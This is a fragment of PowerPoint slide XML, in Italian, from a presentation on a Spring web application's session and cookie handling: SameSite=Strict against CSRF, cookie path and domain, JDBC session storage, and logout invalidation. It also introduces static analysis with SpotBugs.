              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In questo caso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, è stato impostato su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, quindi il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cookie di sessione può essere inviato solo con richieste provenienti dalla stessa origine o dallo stesso sito. Ciò significa che il cookie di sessione non verrà inviato se la richiesta proviene da un altro sito o da una risorsa esterna.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1212311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Gestione sessione e cookie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algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Questa proprietà imposta il percorso del cookie di sessione. È stato impostato su "/" che indica che il cookie di sessione sarà valido per tutto il contesto dell'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Questa proprietà imposta il dominio del cookie di sessione. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È stato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> impostato su "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>", indicando che il cookie di sessione sarà valido solo per il dominio "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A99D05E-173E-9666-444B-9DEC2E7298D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580226" y="3871678"/>
            <a:ext cx="6385692" cy="2300522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321325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3767E5-19F3-AB16-FCD8-FF890747BDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Tecnologie utilizzate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1D3215-EE13-704A-3DAF-72383FFAB2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2760914299"/>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106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Gestione sessione e cookie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a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>È stata configurata l’archiviazione delle sessioni nel database SQL. Nel file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>application.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>sono state settate le seguenti proprietà:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>spring.session.store-type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jdbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>indica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>che le sessioni verranno memorizzate in un database utilizzando JDBC come meccanismo di accesso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC60ABE9-FE55-4721-FA46-D5A18A242CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="48160"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3473450" y="4325112"/>
            <a:ext cx="5245100" cy="467440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28068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Gestione sessione e cookie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cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Se durante il login dell’utente, ha una sessione già attiva, quest’ultima verrà eliminata.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21E91F5-1E13-A3CB-DCAD-30999D856696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2024963" y="3741008"/>
            <a:ext cx="7772400" cy="1518329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125703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Gestione sessione e cookie</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rPr>
              <a:t>Quando l’utente decide di effettuare il logout, gli viene chiesto se desidera concludere la sessione di logout, tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Tale funzione prevede:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Eliminazione dei dati della sessione dal database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Rimozione degli attributi di sessione, come id e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Invalidazione della sessione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC55C19-8CE9-574C-DCFD-6E3908EF73EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974268" y="3780560"/>
            <a:ext cx="5020290" cy="2391640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, biglietto da visita, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD37B5C-D8C7-415C-67B4-CD93E99CD88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="4976380"/>
            <a:ext cx="4318098" cy="1647896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581449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E7F19E0-303F-D977-3556-907DADE26EB3}"/>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err="1"/>
              <a:t>Analisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1"/>
              <a:t>statica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24"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268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SpotBugs</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a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È stata effettuata una analisi preliminare con il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è uno strumento di analisi statica del codice sorgente per il linguaggio di programmazione Java. È una continuazione del progetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>FindBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> ed è ampiamente utilizzato per individuare potenziali bug e problemi nel codice Java.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Rileva bug comuni come errori di programmazione, problemi di prestazioni e potenziali vulnerabilità di sicurezza. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> utilizza una vasta gamma di regole e pattern di analisi per individuare potenziali problemi nel codice sorgente.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Può essere utilizzato per migliorare la qualità del codice, identificare aree di miglioramento e ridurre il rischio di bug nel software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151768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SpotBugs</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l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> può essere integrato in diversi ambienti di sviluppo e strumenti di build, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Gradle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e Eclipse, rendendo facile l'integrazione dell'analisi statica nel processo di sviluppo del software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> consente di eseguire l'analisi statica del codice durante la fase di build del progetto.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>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 Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
